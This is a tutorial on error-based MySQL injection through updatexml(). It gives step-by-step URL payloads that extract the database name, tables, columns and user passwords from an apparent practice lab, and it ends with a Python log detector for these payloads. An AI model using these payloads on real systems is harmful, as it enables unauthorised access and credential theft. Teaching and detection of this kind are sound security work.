# Introduction
The updatexml() function
updatexml(XML_document, XPath_string, new_value) takes three parameters:
The first parameter, XML_document, is a string: the name of the XML document object, such as Doc.
The second parameter, XPath_string, is the path, a string in XPath format.
The third parameter, new_value, is a string that replaces the data matching the condition.
# updatexml error reporting principle
The error reporting principle of updatexml() is exactly the same as that of extractvalue().
Call updatexml in a select and deliberately write an invalid path for the XPath parameter, which causes it to raise an error. The select query embedded in that path is executed before the error is raised, and its result is echoed back in the error message. What is echoed is the content we want to view.
Note: updatexml, like extractvalue, can only return a string of 32 characters, so you still need to use the substring function.
# updatexml() injection syntax analysis
and 1=updatexml(1,2,3)
1. The first parameter can be any value
2. The second parameter is concat(1,2), where
(1): 0x7e or '~'
(2): (select query statement)
3. The third parameter can be any value
Example: and 1=updatexml(1,concat('~',(select database())),3)
# Case demo
Error-based injection using updatexml()
1. Determine whether the parameter is a string type or a numeric type; if it is a string type, determine how it is closed
First send a single quotation mark ('): the page is normal
Then send a double quotation mark ("): the page reports an error
Take the content of the error:
'"1"" LIMIT 0,1'
"1"" LIMIT 0,1
The red double quotes are what we entered
From the error echoed by the page, it is determined that double quotation marks (") are used to close the
2. Get the database name
?id=1" and updatexml(1,concat('~',(select database())),3) --+
The database is confirmed to be security
3. Get the data table
?id=1" and 1=updatexml(1,concat('~',(select group_concat(table_name)from information_schema.tables where table_schema=database())),3) --+
The data tables are:
emails
referers
agents
users
4. Get all field information in the users data table
?id=1" and 1=updatexml(1,concat('~',(select group_concat(column_name)from information_schema.columns where table_name='users' and table_schema=database())),3)--+
The fields are:
id
username
password
5. Dump the data (using the substring function)
?id=1" and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,'--',password),1,30)from security.users)),3) --+
If you need to see more user information, you only need to change the last two parameters of substring.
The above is error-based injection for the string type. The numeric type works the same way, except that no closing character or trailing comment is needed, so it can be tested directly.
For example: ?id=1 and 1=updatexml(1,concat('~',(select database())),3)
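
A defender's view of the payloads above, as an added example that is not part of the original post: Python code that flags updatexml()/extractvalue() calls in URL-encoded access-log requests and picks out the value echoed in the resulting error. The log lines, the /item.php path and all function names are constructed for illustration, and the response check assumes the application prints MySQL's error text unmodified.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# MySQL XML functions named on this page, followed by an opening parenthesis.
XML_FUNC = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
SUBQUERY = re.compile(r"\(\s*select\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Text MySQL puts in the error when the XPath argument is invalid.
LEAK = re.compile(r"XPATH syntax error: '([^']*)'")

def normalize(value, max_rounds=3):
    """URL-decode repeatedly so %25-wrapped encodings are seen in clear."""
    for _ in range(max_rounds):
        value = unquote_plus(value)
    return value

def classify(query):
    """Return 'function:kind' for a raw query string, or None if clean."""
    text = normalize(query)
    match = XML_FUNC.search(text)
    if not match:
        return None
    # A nested SELECT after the call is the extraction form; a bare call is a probe.
    kind = "extraction" if SUBQUERY.search(text, match.end()) else "probe"
    return f"{match.group(1).lower()}:{kind}"

def scan(log_lines):
    """Return [(line_number, verdict)] for access-log lines that match."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        request = REQUEST.search(line)
        verdict = classify(urlsplit(request.group(1)).query) if request else None
        if verdict:
            hits.append((number, verdict))
    return hits

def leaked_value(response_body):
    """Return the text a response echoes inside an XPath error, else None."""
    match = LEAK.search(response_body)
    return match.group(1) if match else None

# Constructed sample data: documentation IP address, made-up path /item.php.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?q=mysql+updatexml+manual HTTP/1.1" 200 655',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=1%20and%201=UpdateXML(1,2,3) HTTP/1.1" 200 802',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=1%22%20and%20updatexml(1,concat(%27~%27,(select%20database())),3)%20--+ HTTP/1.1" 200 810',
]
SAMPLE_BODY = "<p>XPATH syntax error: '~security'</p>"  # constructed response
```

A hit from leaked_value() means database errors reach the client; returning a generic error page and using parameterized queries removes the channel this technique depends on.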